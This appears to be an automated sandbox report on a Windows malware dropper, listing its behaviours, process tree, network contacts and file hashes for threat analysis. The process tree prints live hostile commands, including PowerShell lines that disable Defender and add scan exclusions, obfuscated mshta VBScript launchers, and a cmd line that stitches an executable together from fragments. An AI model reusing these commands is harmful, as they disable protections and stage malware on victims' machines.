| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2816 set thread context of 2540 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe |
| PID 2408 set thread context of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe |
| PID 1072 set thread context of 1828 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe
Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe
Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe
Wed09a6fb1d0dd846.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe
Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe
Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$70190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe
Wed0911cd5800a45.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 272
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe
Wed0961d5d40c7b937c7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe
Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed0911cd5800a45.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 464
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:49275 | tcp | |
| N/A | 127.0.0.1:49277 | tcp | |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 1b16fe969e31beab26afc7060fba271b |
| SHA1 | 97f350235d63a11eb5bf555d1d63f8667d47fb31 |
| SHA256 | c8345b213f585dffbfc2ec8374dee34b9760c4ce5ddc02414cb90de95dd85e7e |
| SHA512 | 90e72cb53e6e983ea3a02aabbb7547873162bdcd47316126c1c7c57efa1104cb6f1f4a0bf5e418a345aba088f23a6d1a02454fb5e50c5222ecfc53fda1ace882 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
| MD5 | 3fce5aacf6f9eb4b34126d0c2a9d36c2 |
| SHA1 | 5590c4402fcda16fe873f857088b4ee6c38858b1 |
| SHA256 | ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12 |
| SHA512 | ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7 |
memory/2896-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2896-66-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2896-77-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2896-76-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2896-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-83-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
| MD5 | 3bf8a169c55f8b54700880baee9099d7 |
| SHA1 | d411f875744aa2cfba6d239bad723cbff4cf771a |
| SHA256 | 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2 |
| SHA512 | f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
